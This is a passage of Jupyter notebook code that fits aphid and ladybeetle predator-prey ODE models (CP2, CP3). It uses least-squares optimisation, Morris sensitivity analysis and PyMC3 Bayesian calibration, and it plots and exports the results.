parameter_values = ee_sample(problem_info, grid_level, num_of_trajectories, local_optimization=False, seed=seed)
# In[66]:
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, 100)
num_of_realizations = parameter_values.shape[0]
num_of_time_points = time_range.shape[0]
qoi_sensitivity_outputs = np.zeros([num_of_realizations, num_of_time_points])
for realization_index, parameters_realization in tqdm(enumerate(parameter_values), total=len(parameter_values)):
realization_ODE_CP2 = CP2_ode_solver(
y0,
(t0, tf + days_to_forecast),
time_range,
*parameters_realization
)
u_realization, v_realization = realization_ODE_CP2.y
pest_time_derivative_array = calculate_pest_time_derivative_series(
time_range,
u_realization,
v_realization,
CP2_model,
parameters_realization
)
qoi_sensitivity_outputs[realization_index, :] = pest_time_derivative_array
# In[67]:
df_Si = pd.DataFrame(columns=['Time', *problem_info['names']])
df_sigmai = pd.DataFrame(columns=['Time', *problem_info['names']])
df_Si['Time'] = time_range
df_sigmai['Time'] = time_range
for time_point in tqdm(range(num_of_time_points)):
try:
Si = ee_analyze(
problem_info,
parameter_values,
qoi_sensitivity_outputs[:, time_point],
num_levels=grid_level,
seed=seed
)
Si['mu_star_normalized'] = Si['mu_star'] / Si['mu_star'].sum()
sigmai_normalized = Si['sigma'] / Si['sigma'].sum()
for idx, param_name in enumerate(problem_info['names']):
df_Si.loc[time_point, param_name] = Si['mu_star_normalized'][idx]
df_sigmai.loc[time_point, param_name] = sigmai_normalized[idx]
except:
continue
df_Si.sort_values(by='Time', inplace=True)
df_Si.drop(index=0, inplace=True)
df_Si.dropna(inplace=True)
df_Si.reset_index(drop=True, inplace=True)
df_sigmai.sort_values(by='Time', inplace=True)
df_sigmai.drop(index=0, inplace=True)
df_sigmai.dropna(inplace=True)
df_sigmai.reset_index(drop=True, inplace=True)
valid_times = df_Si.Time.values
df_Si
# In[68]:
df_sigmai
# In[69]:
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_mu = valid_times[::step_to_plot]
df_Si[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_mu[x]:.2f}")
plt.ylabel(r"Normalized $\mu^*$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_derivative_CP2.png", dpi=300)
plt.show()
# In[70]:
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_sigma = valid_times[::step_to_plot]
df_sigmai[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_sigma[x]:.2f}")
plt.ylabel(r"Normalized $\sigma$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_sigma_derivative_CP2.png", dpi=300)
plt.show()
# ## Bayesian calibration
# In[71]:
@theano.compile.ops.as_op(
itypes=[
t.dvector,
t.dscalar, # r1
t.dscalar, # a1
t.dscalar, # a2
t.dscalar, # a3
t.dscalar, # u0
t.dscalar, # v0
],
otypes=[t.dmatrix]
)
def CP2_ode_wrapper(time_exp, r1, a1, a2, a3, u0, v0):
time_span = (time_exp.min(), time_exp.max())
args = [r1, a1, a2, a3]
initial_conditions = np.array([u0, v0])
y_model = solve_ivp(
CP2_model,
time_span,
initial_conditions,
t_eval=time_exp,
method='LSODA',
args=args
)
simulated_time = y_model.t
simulated_ode_solution = y_model.y
simulated_qoi1, simulated_qoi2 = simulated_ode_solution
concatenate_simulated_qoi = np.vstack([simulated_qoi1, simulated_qoi2]).T
return concatenate_simulated_qoi
# In[72]:
observed_aphids = aphid_observed.Density.values.astype(np.float64)
observed_ladybeetles = ladybeetle_observed.Density.values.astype(np.float64)
observations_to_fit = np.vstack([observed_aphids, observed_ladybeetles]).T # note the transpose here
time_observations = aphid_data.Time.values.astype(np.float64)
print("\n*** Performing Bayesian calibration ***")
print("-- Running Monte Carlo simulations:")
draws = 1000
start_time = time.time()
percent_calibration = 0.95
with pm.Model() as fine_model_CP2:
# Prior distributions for the model's parameters
# r1_ = pm.Uniform(
# "r1",
# lower=(1.0 - percent_calibration) * r1,
# upper=(1.0 + percent_calibration) * r1,
# )
r1_ = pm.Data("r1", r1)
a1_ = pm.Uniform(
"a1",
lower=(1.0 - percent_calibration) * a1,
upper=1e6#(1.0 + 100 * percent_calibration) * a1,
)
# a2_ = pm.Uniform(
# "a2",
# lower=(1.0 - percent_calibration) * a2,
# upper=(1.0 + percent_calibration) * a2,
# )
a2_ = pm.Data("a2", a2)
a3_ = pm.Uniform(
"a3",
lower=(1.0 - percent_calibration) * a3,
upper=1e6#(1.0 + 100 * percent_calibration) * a3,
)
# Prioris for Initial Conditions
u0, v0 = y0
u0_ = pm.Data("u0", u0)
v0_ = pm.Data("v0", v0)
standard_deviation = pm.Uniform("std_deviation", lower=1, upper=1000, shape=2) # note 'shape' here
# Wrapper for time. We need it this way in order to change it for predictions
time_calibration = pm.Data("time", time_observations)
# Defining the deterministic formulation of the problem
fitting_model = pm.Deterministic(
"CP2_model",
CP2_ode_wrapper(
time_calibration,
r1_,
a1_,
a2_,
a3_,
u0_,
v0_,
),
)
likelihood_model = pm.Normal(
"likelihood_model", mu=fitting_model, sigma=standard_deviation, observed=observations_to_fit
)
coarse_steps_1 = 4
observed_aphids_coarse_1 = observed_aphids[::coarse_steps_1]
observed_ladybeetles_coarse_1 = observed_ladybeetles[::coarse_steps_1]
observations_to_fit_coarse_1 = np.vstack(
[observed_aphids_coarse_1, observed_ladybeetles_coarse_1]
).T
time_observations_coarse_1 = time_observations[::coarse_steps_1]
with pm.Model() as coarse_model_1:
# Prior distributions for the model's parameters
# r1_ = pm.Uniform(
# "r1",
# lower=(1.0 - percent_calibration) * r1,
# upper=(1.0 + percent_calibration) * r1,
# )
r1_ = pm.Data("r1", r1)
a1_ = pm.Uniform(
"a1",
lower=(1.0 - percent_calibration) * a1,
upper=1e6#(1.0 + 100 * percent_calibration) * a1,
)
# a2_ = pm.Uniform(
# "a2",
# lower=(1.0 - percent_calibration) * a2,
# upper=(1.0 + percent_calibration) * a2,
# )
a2_ = pm.Data("a2", a2)
a3_ = pm.Uniform(
"a3",
lower=(1.0 - percent_calibration) * a3,
upper=1e6#(1.0 + 100 * percent_calibration) * a3,
)
# Prioris for Initial Conditions
u0, v0 = y0
u0_ = pm.Data("u0", u0)
v0_ = pm.Data("v0", v0)
standard_deviation = pm.Uniform("std_deviation", lower=1, upper=1000, shape=2) # note 'shape' here
# Wrapper for time. We need it this way in order to change it for predictions
time_calibration = pm.Data("time", time_observations_coarse_1)
# Defining the deterministic formulation of the problem
fitting_model = pm.Deterministic(
"CP2_model",
CP2_ode_wrapper(
time_calibration,
r1_,
a1_,
a2_,
a3_,
u0_,
v0_,
),
)
likelihood_model = pm.Normal(
"likelihood_model", mu=fitting_model, sigma=standard_deviation, observed=observations_to_fit_coarse_1
)
coarse_steps_2 = 2
observed_aphids_coarse_2 = observed_aphids[::coarse_steps_2]
observed_ladybeetles_coarse_2 = observed_ladybeetles[::coarse_steps_2]
observations_to_fit_coarse_2 = np.vstack(
[observed_aphids_coarse_2, observed_ladybeetles_coarse_2]
).T
time_observations_coarse_2 = time_observations[::coarse_steps_2]
with pm.Model() as coarse_model_2:
# Prior distributions for the model's parameters
# r1_ = pm.Uniform(
# "r1",
# lower=(1.0 - percent_calibration) * r1,
# upper=(1.0 + percent_calibration) * r1,
# )
r1_ = pm.Data("r1", r1)
a1_ = pm.Uniform(
"a1",
lower=(1.0 - percent_calibration) * a1,
upper=1e6#(1.0 + 100 * percent_calibration) * a1,
)
# a2_ = pm.Uniform(
# "a2",
# lower=(1.0 - percent_calibration) * a2,
# upper=(1.0 + percent_calibration) * a2,
# )
a2_ = pm.Data("a2", a2)
a3_ = pm.Uniform(
"a3",
lower=(1.0 - percent_calibration) * a3,
upper=1e6#(1.0 + 100 * percent_calibration) * a3,
)
# Prioris for Initial Conditions
u0, v0 = y0
u0_ = pm.Data("u0", u0)
v0_ = pm.Data("v0", v0)
standard_deviation = pm.Uniform("std_deviation", lower=0, upper=1000, shape=2) # note 'shape' here
# Wrapper for time. We need it this way in order to change it for predictions
time_calibration = pm.Data("time", time_observations_coarse_2)
# Defining the deterministic formulation of the problem
fitting_model = pm.Deterministic(
"CP2_model",
CP2_ode_wrapper(
time_calibration,
r1_,
a1_,
a2_,
a3_,
u0_,
v0_,
),
)
likelihood_model = pm.Normal(
"likelihood_model", mu=fitting_model, sigma=standard_deviation, observed=observations_to_fit_coarse_2
)
with fine_model_CP2:
step = pm.MLDA(coarse_models=[coarse_model_1], subsampling_rates=[5])
# step = pm.DEMetropolisZ()
trace_calibration_CP2 = pm.sample(draws=4500, chains=4, cores=4, tune=1000, step=step, random_seed=seed)
duration = time.time() - start_time
print(f"-- Monte Carlo simulations done in {duration / 60:.3f} minutes")
# In[73]:
plt.hist(trace_calibration_CP2['a1'], bins=35)
plt.show()
# In[74]:
calibration_variable_names = [
"std_deviation",
"a1",
"a3",
]
# In[75]:
plot_step = 1
progress_bar = tqdm(calibration_variable_names)
for variable in progress_bar:
pm.plot_posterior(
trace_calibration_CP2[::plot_step],
var_names=(f"{variable}"),
kind="hist",
round_to=4,
point_estimate="mode"
)
plt.savefig(f"img/{variable}_posterior_cal_CP2.png")
# In[76]:
az.plot_pair(
trace_calibration_CP2,
var_names=calibration_variable_names,
kind="hexbin",
fill_last=False,
marginals=True,
figsize=(10, 8),
)
plt.savefig("img/marginals_cal_CP2.png")
# In[77]:
df_stats_summary = az.summary(
data=trace_calibration_CP2,
var_names=calibration_variable_names,
kind='stats',
round_to=15, # arredondamento de ponto flutuante no sumário
)
df_stats_summary
# Auxiliary functions to compute the Most Probable Value (MPV):
# In[78]:
from scipy.stats import gaussian_kde # to calculate MPV from KDE
def _scalar_rv_mvp_estimation(rv_realization_values: np.ndarray) -> np.ndarray:
num_of_realizations = len(rv_realization_values)
kernel = gaussian_kde(rv_realization_values)
equally_spaced_samples = np.linspace(
rv_realization_values.min(),
rv_realization_values.max(),
num_of_realizations
)
kde = kernel(equally_spaced_samples)
kde_max_index = np.argmax(kde)
rv_mpv_value = equally_spaced_samples[kde_max_index]
return rv_mpv_value
def calculate_rv_posterior_mpv(pm_trace, variable_names: list) -> dict:
rv_mpv_values_dict = dict()
progress_bar = tqdm(variable_names)
for variable in progress_bar:
progress_bar.set_description(f"Calculating MPV from KDE for {variable}")
rv_realization_values = pm_trace[f"{variable}"]
try:
num_of_dimensions = rv_realization_values.shape[1]
except IndexError:
num_of_dimensions = 0
if num_of_dimensions == 0:
rv_mpv_value = _scalar_rv_mvp_estimation(rv_realization_values)
rv_mpv_values_dict[f"{variable}"] = rv_mpv_value
else:
for dimension in range(num_of_dimensions):
variable_name_decomposed = f"{variable}[{dimension}]"
rv_realization_values_decomposed = np.array(rv_realization_values[:, dimension])
rv_mpv_value = _scalar_rv_mvp_estimation(rv_realization_values_decomposed)
rv_mpv_values_dict[f"{variable_name_decomposed}"] = rv_mpv_value
return rv_mpv_values_dict
def add_mpv_to_summary(arviz_summary: pd.DataFrame, rv_modes_dict: dict) -> pd.DataFrame:
new_arviz_summary = arviz_summary.copy()
variable_names = list(rv_modes_dict.keys())
rv_mode_values = list(rv_modes_dict.values())
new_arviz_summary["mpv"] = pd.Series(data=rv_mode_values, index=variable_names)
return new_arviz_summary
# In[79]:
calibration_variable_mpv = calculate_rv_posterior_mpv(
pm_trace=trace_calibration_CP2, variable_names=calibration_variable_names
)
df_stats_summary = add_mpv_to_summary(df_stats_summary, calibration_variable_mpv)
df_stats_summary.to_csv("csv/stats_summary_calibration_CP2.csv") # salvando em um csv para consultas
df_stats_summary
# In[80]:
percentile_cut = 2.5
y_min = np.percentile(trace_calibration_CP2["CP2_model"], percentile_cut, axis=0)
y_max = np.percentile(trace_calibration_CP2["CP2_model"], 100 - percentile_cut, axis=0)
y_fit = np.percentile(trace_calibration_CP2["CP2_model"], 50, axis=0)
# In[81]:
plt.figure(figsize=(15, 5))
plt.plot(
time_observations,
y_fit[:, 0],
"r",
label="Aphids (simulated)",
marker="X",
linestyle="-",
markersize=10,
)
plt.fill_between(time_observations, y_min[:, 0], y_max[:, 0], color="r", alpha=0.2)
plt.plot(
time_observations,
y_fit[:, 1],
"b",
label="Ladybeetles (simulated)",
marker="o",
linestyle="-",
markersize=10,
)
plt.fill_between(time_observations, y_min[:, 1], y_max[:, 1], color="b", alpha=0.2)
plt.plot(
time_observations,
aphid_observed.Density.values,
label="Aphids data",
marker="s",
linestyle="",
markersize=10
)
plt.plot(
time_observations,
ladybeetle_observed.Density.values,
label="Ladybeetles data",
marker="v",
linestyle="",
markersize=10
)
plt.legend(shadow=True)
plt.xlabel('Time', fontsize=15)
plt.ylabel('Population densities', fontsize=15)
plt.tight_layout()
plt.savefig("img/calibration_CP2.png", dpi=300)
plt.show()
# In[82]:
print("-- Exporting calibrated parameter to CSV")
start_time = time.time()
dict_realizations = dict() # vamos gravar as realizações em um dicionário Python tbm
progress_bar = tqdm(calibration_variable_names[1:])
for variable in progress_bar:
progress_bar.set_description(f"Gathering {variable} realizations")
parameter_realization = trace_calibration_CP2.get_values(f"{variable}")
dict_realizations[f"{variable}"] = parameter_realization
df_realizations = pd.DataFrame(dict_realizations)
df_realizations.to_csv("csv/calibration_realizations_CP2.csv")
duration = time.time() - start_time
print(f"-- Exported done in {duration:.3f} seconds")
# In[83]:
df_realizations
# # Constant Prey Growth FR3 model
# ## The parameter a1 doesn't have a maximum threshold
# In[84]:
import matplotlib.pyplot as plt
from numba import jit
import numpy as np # linear algebra
from scipy.integrate import solve_ivp # to solve ODE system
import pandas as pd
@jit(nopython=True)
def CP3_model(
t,
X,
r1 = 1,
a1 = 1,
a2 = 1,
a3 = 1,
):
u, v = X
u_prime = r1 - a1 * u * u * v / ( a2 + a3 * u * u )
v_prime = 0
return u_prime, v_prime
def CP3_ode_solver(
y0,
t_span,
t_eval,
r1 = 1,
a1 = 1,
a2 = 1,
a3 = 1,
):
solution_ODE = solve_ivp(
fun=CP3_model,
t_span=t_span,
y0=y0,
t_eval=t_eval,
args=(r1,a1,a2,a3),
method="LSODA",
)
return solution_ODE
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, len(aphid_data.Time.values))
u_data = aphid_data.Density.values
v_data = ladybeetle_data.Density.values
# * We now need to calibrate the parameters of the function. Firstly, we have to define a least-squares residual error function:
# In[85]:
def CP3_least_squares_error_ode(
par, time_exp, f_exp, fitting_model, initial_conditions
):
args = par
f_exp1, f_exp2 = f_exp
time_span = (time_exp.min(), time_exp.max())
weighting_for_exp1_constraints = 1
weighting_for_exp2_constraints = 1
num_of_qoi = len(f_exp)
try:
y_model = fitting_model(initial_conditions, time_span, time_exp, *args)
# y_model = fitting_model(time_span, time_exp, *args)
simulated_time = y_model.t
simulated_ode_solution = y_model.y
simulated_qoi1, simulated_qoi2 = simulated_ode_solution
residual1 = f_exp1 - simulated_qoi1
residual2 = f_exp2 - simulated_qoi2
first_term = weighting_for_exp1_constraints * np.sum(residual1 ** 2.0)
second_term = weighting_for_exp2_constraints * np.sum(residual2 ** 2.0)
objective_function = 1 / num_of_qoi * (first_term + second_term)
except ValueError:
objective_function = 1e15
return objective_function
def callback_de(xk, convergence):
"""
This function is to show the optimization procedure progress.
"""
print(f'parameters = {xk}\n')
# * Now we calibrate minimizing the residual applying the Differential Evolution method, a global optimization method, provided by `scipy`:
# In[86]:
from scipy import optimize
seed = 1234
r1=0.0012401581202450042
a1=0.5327293756383306
a2=2.4307154223146714e-05
a3=0.06537209705777657
denom_min = 0.1
denom_max = 1.9
bounds_CP3 = [
( ( r1 * denom_min ), ( r1 * denom_max ) ), # r1
( ( a1 * denom_min ), ( a1 * denom_max ) ), # a1
( ( a2 * denom_min ), ( a2 * denom_max ) ), # a2
( ( a3 * denom_min ), ( a3 * denom_max ) ), # a3
]
result_CP3 = optimize.differential_evolution(
CP3_least_squares_error_ode,
bounds=bounds_CP3,
args=(
aphid_data.Time.values,
[aphid_data.Density.values, ladybeetle_data.Density.values],
CP3_ode_solver,
y0,
),
popsize=30,
strategy="best1bin",
tol=1e-5,
recombination=0.95,
mutation=0.6,
maxiter=20000, # 2000
polish=True,
disp=True,
seed = seed, # for the sake of reproducibility
callback=callback_de,
workers=-1,
)
print(result_CP3)
# * Retrieving the calibrated parameter values:
# In[87]:
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, 100)
(
r1_deterministic,
a1_deterministic,
a2_deterministic,
a3_deterministic,
) = result_CP3.x
solution_ODE_CP3 = CP3_ode_solver(
y0,
(t0, tf + days_to_forecast),
time_range,
*result_CP3.x
)
t_computed_CP3, y_computed_CP3 = solution_ODE_CP3.t, solution_ODE_CP3.y
u_CP3, v_CP3 = y_computed_CP3
parameters_dict = {
"Model": "CP3",
u"$r1$": r1_deterministic,
u"$a1$": a1_deterministic,
u"$a2$": a2_deterministic,
u"$a3$": a3_deterministic,
}
print("r1=" + str(r1_deterministic) + "\n" + "a1=" + str(a1_deterministic) + "\n" + "a2=" + str(a2_deterministic) + "\n" + "a3=" + str(a3_deterministic) )
df_parameters_calibrated = pd.DataFrame.from_records([parameters_dict])
#print(df_parameters_calibrated.to_latex(index=False))
# #### Simulation
# In[88]:
import matplotlib.pyplot as plt
aphid_observed = aphid_data[:].copy()
ladybeetle_observed = ladybeetle_data[:].copy()
plt.plot(t_computed_CP3, u_CP3, '-x')
plt.plot(aphid_data.Time.values, aphid_observed.Density.values, 'o', label='Observed')
plt.xlabel('Time')
plt.ylabel('Aphid population')
plt.show()
plt.plot(t_computed_CP3, v_CP3, '-x')
plt.plot(ladybeetle_data.Time.values, ladybeetle_observed.Density.values, 'o', label='Observed')
plt.xlabel('Time')
plt.ylabel('Ladybeetle population')
plt.show()
# ## Sensitivity Analyses
# ### Least-Squares objective function
# In[89]:
from SALib.sample.morris import sample as ee_sample
mean_values_params = [
r1,
a1,
a2,
a3,
]
factors_names = [
r"$r1$",
r"$a1$",
r"$a2$",
r"$a3$",
]
params_perturbations = 0.5
problem_info = {
'num_vars': len(mean_values_params),
'names': factors_names,
'bounds': [[param - params_perturbations * param, param + params_perturbations * param] for param in mean_values_params]
}
grid_level = 4
num_of_trajectories = 20
parameter_values = ee_sample(problem_info, grid_level, num_of_trajectories, local_optimization=False, seed=seed)
# In[90]:
from tqdm import tqdm
num_of_realizations = parameter_values.shape[0]
qoi_sensitivity_outputs = np.zeros(num_of_realizations)
for realization_index, parameters_realization in tqdm(enumerate(parameter_values), total=len(parameter_values)):
residual_least_squares_result = CP3_least_squares_error_ode(
parameters_realization,
aphid_data.Time.values,
[u_data, v_data],
CP3_ode_solver,
y0
)
qoi_sensitivity_outputs[realization_index] = residual_least_squares_result
# In[91]:
from SALib.analyze.morris import analyze as ee_analyze
data_time = aphid_data.Time.values
num_of_experimental_points = data_time.shape[0]
df_Si = pd.DataFrame(columns=[*problem_info['names']])
Si = ee_analyze(problem_info, parameter_values, qoi_sensitivity_outputs, num_levels=grid_level, seed=seed)
Si['mu_star_normalized'] = Si['mu_star'] / Si['mu_star'].sum()
for idx, param_name in enumerate(problem_info['names']):
df_Si.loc[0, param_name] = Si['mu_star_normalized'][idx]
df_Si = df_Si.T
df_Si.rename(columns={0: r'$\mu^*$'}, inplace=True)
df_Si.sort_values(by=r'$\mu^*$', ascending=False, inplace=True)
df_Si
# In[92]:
df_Si.T.plot.bar(rot=0, width=3, figsize=(9, 6))
plt.rcParams.update({'font.size': 16})
plt.ylabel(r"$\mu^*$")
plt.legend(fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/sensitivity_least_squares_CP3.png", dpi=300)
plt.show()
# ### Prey (pest) population
# In[93]:
from SALib.sample.morris import sample as ee_sample
mean_values_params = [
r1,
a1,
a2,
a3,
]
factors_names = [
r"$r1$",
r"$a1$",
r"$a2$",
r"$a3$",
]
params_perturbations = 0.5
problem_info = {
'num_vars': len(mean_values_params),
'names': factors_names,
'bounds': [[param - params_perturbations * param, param + params_perturbations * param] for param in mean_values_params]
}
grid_level = 4
num_of_trajectories = 20
parameter_values = ee_sample(problem_info, grid_level, num_of_trajectories, local_optimization=False, seed=seed)
# In[94]:
from tqdm import tqdm
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, 100)
num_of_realizations = parameter_values.shape[0]
num_of_time_points = time_range.shape[0]
qoi_sensitivity_outputs = np.zeros([num_of_realizations, num_of_time_points])
for realization_index, parameters_realization in tqdm(enumerate(parameter_values), total=len(parameter_values)):
realization_ODE_CP3 = CP3_ode_solver(
y0,
(t0, tf + days_to_forecast),
time_range,
*parameters_realization
)
u_realization, v_realization = realization_ODE_CP3.y
qoi_sensitivity_outputs[realization_index, :] = u_realization
# In[95]:
from SALib.analyze.morris import analyze as ee_analyze
df_Si = pd.DataFrame(columns=['Time', *problem_info['names']])
df_sigmai = pd.DataFrame(columns=['Time', *problem_info['names']])
df_Si['Time'] = time_range
df_sigmai['Time'] = time_range
for time_point in tqdm(range(num_of_time_points)):
try:
Si = ee_analyze(
problem_info,
parameter_values,
qoi_sensitivity_outputs[:, time_point],
num_levels=grid_level,
seed=seed
)
Si['mu_star_normalized'] = Si['mu_star'] / Si['mu_star'].sum()
sigmai_normalized = Si['sigma'] / Si['sigma'].sum()
for idx, param_name in enumerate(problem_info['names']):
df_Si.loc[time_point, param_name] = Si['mu_star_normalized'][idx]
df_sigmai.loc[time_point, param_name] = sigmai_normalized[idx]
except:
continue
df_Si.sort_values(by='Time', inplace=True)
df_Si.drop(index=0, inplace=True)
df_Si.dropna(inplace=True)
df_Si.reset_index(drop=True, inplace=True)
df_sigmai.sort_values(by='Time', inplace=True)
df_sigmai.drop(index=0, inplace=True)
df_sigmai.dropna(inplace=True)
df_sigmai.reset_index(drop=True, inplace=True)
valid_times = df_Si.Time.values
df_Si
# In[96]:
df_sigmai
# In[97]:
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_mu = valid_times[::step_to_plot]
df_Si[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_mu[x]:.2f}")
plt.ylabel(r"Normalized $\mu^*$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_CP3.png", dpi=300)
plt.show()
# In[98]:
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_sigma = valid_times[::step_to_plot]
df_sigmai[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_sigma[x]:.2f}")
plt.ylabel(r"Normalized $\sigma$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_sigma_CP3.png", dpi=300)
plt.show()
# ### Time-derivative of pest (prey) population
# In[99]:
def calculate_pest_time_derivative_series(
time_array,
u_array,
v_array,
ode_model,
model_pars
):
pest_time_derivative_values = list()
for t_idx, time in enumerate(time_array):
u = u_array[t_idx]
v = v_array[t_idx]
stacked_population = [u, v]
pest_time_derivative_value, _ = ode_model(time, stacked_population, *model_pars)
pest_time_derivative_values.append(pest_time_derivative_value)
pest_time_derivative_array = np.array(pest_time_derivative_values)
return pest_time_derivative_array
# In[100]:
pest_time_derivative_array = calculate_pest_time_derivative_series(
t_computed_CP3,
u_CP3,
v_CP3,
CP3_model,
mean_values_params
)
pest_time_derivative_array
# In[101]:
plt.figure(figsize=(9, 7))
plt.plot(t_computed_CP3, u_CP3, '-x', label='Pest population')
plt.plot(t_computed_CP3, pest_time_derivative_array, '-o', label='Pest time derivative')
plt.xlabel('Time')
plt.ylabel('Aphid population')
plt.grid()
plt.legend(shadow=True)
plt.savefig("img/pest_derivative_CP3.png", dpi=300)
plt.show()
# In[102]:
mean_values_params = [
r1,
a1,
a2,
a3,
]
factors_names = [
r"$r1$",
r"$a1$",
r"$a2$",
r"$a3$",
]
params_perturbations = 0.5
problem_info = {
'num_vars': len(mean_values_params),
'names': factors_names,
'bounds': [[param - params_perturbations * param, param + params_perturbations * param] for param in mean_values_params]
}
grid_level = 4
num_of_trajectories = 20
parameter_values = ee_sample(problem_info, grid_level, num_of_trajectories, local_optimization=False, seed=seed)
# In[103]:
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, 100)
num_of_realizations = parameter_values.shape[0]
num_of_time_points = time_range.shape[0]
qoi_sensitivity_outputs = np.zeros([num_of_realizations, num_of_time_points])
for realization_index, parameters_realization in tqdm(enumerate(parameter_values), total=len(parameter_values)):
realization_ODE_CP3 = CP3_ode_solver(
y0,
(t0, tf + days_to_forecast),
time_range,
*parameters_realization
)
u_realization, v_realization = realization_ODE_CP3.y
pest_time_derivative_array = calculate_pest_time_derivative_series(
time_range,
u_realization,
v_realization,
CP3_model,
parameters_realization
)
qoi_sensitivity_outputs[realization_index, :] = pest_time_derivative_array
# In[104]:
df_Si = pd.DataFrame(columns=['Time', *problem_info['names']])
df_sigmai = pd.DataFrame(columns=['Time', *problem_info['names']])
df_Si['Time'] = time_range
df_sigmai['Time'] = time_range
for time_point in tqdm(range(num_of_time_points)):
try:
Si = ee_analyze(
problem_info,
parameter_values,
qoi_sensitivity_outputs[:, time_point],
num_levels=grid_level,
seed=seed
)
Si['mu_star_normalized'] = Si['mu_star'] / Si['mu_star'].sum()
sigmai_normalized = Si['sigma'] / Si['sigma'].sum()
for idx, param_name in enumerate(problem_info['names']):
df_Si.loc[time_point, param_name] = Si['mu_star_normalized'][idx]
df_sigmai.loc[time_point, param_name] = sigmai_normalized[idx]
except:
continue
df_Si.sort_values(by='Time', inplace=True)
df_Si.drop(index=0, inplace=True)
df_Si.dropna(inplace=True)
df_Si.reset_index(drop=True, inplace=True)
df_sigmai.sort_values(by='Time', inplace=True)
df_sigmai.drop(index=0, inplace=True)
df_sigmai.dropna(inplace=True)
df_sigmai.reset_index(drop=True, inplace=True)
valid_times = df_Si.Time.values
df_Si
# In[105]:
df_sigmai
# In[106]:
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_mu = valid_times[::step_to_plot]
df_Si[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_mu[x]:.2f}")
plt.ylabel(r"Normalized $\mu^*$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_derivative_CP3.png", dpi=300)
plt.show()
# In[107]:
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_sigma = valid_times[::step_to_plot]
df_sigmai[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_sigma[x]:.2f}")
plt.ylabel(r"Normalized $\sigma$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_sigma_derivative_CP3.png", dpi=300)
plt.show()
# ## Bayesian calibration
# In[108]:
@theano.compile.ops.as_op(
itypes=[
t.dvector,
t.dscalar, # r1
t.dscalar, # a1
t.dscalar, # a2
t.dscalar, # a3
t.dscalar, # u0
t.dscalar, # v0
],
otypes=[t.dmatrix]
)
def CP3_ode_wrapper(time_exp, r1, a1, a2, a3, u0, v0):
time_span = (time_exp.min(), time_exp.max())
args = [r1, a1, a2, a3]
initial_conditions = np.array([u0, v0])
y_model = solve_ivp(
CP3_model,
time_span,
initial_conditions,
t_eval=time_exp,
method='LSODA',
args=args
)
simulated_time = y_model.t
simulated_ode_solution = y_model.y
simulated_qoi1, simulated_qoi2 = simulated_ode_solution
concatenate_simulated_qoi = np.vstack([simulated_qoi1, simulated_qoi2]).T
return concatenate_simulated_qoi
# In[109]:
observed_aphids = aphid_observed.Density.values.astype(np.float64)
observed_ladybeetles = ladybeetle_observed.Density.values.astype(np.float64)
observations_to_fit = np.vstack([observed_aphids, observed_ladybeetles]).T # note the transpose here
time_observations = aphid_data.Time.values.astype(np.float64)
print("\n*** Performing Bayesian calibration ***")
print("-- Running Monte Carlo simulations:")
draws = 1000
start_time = time.time()
percent_calibration = 0.95
with pm.Model() as fine_model_CP3:
# Prior distributions for the model's parameters
# r1_ = pm.Uniform(
# "r1",
# lower=(1.0 - percent_calibration) * r1,
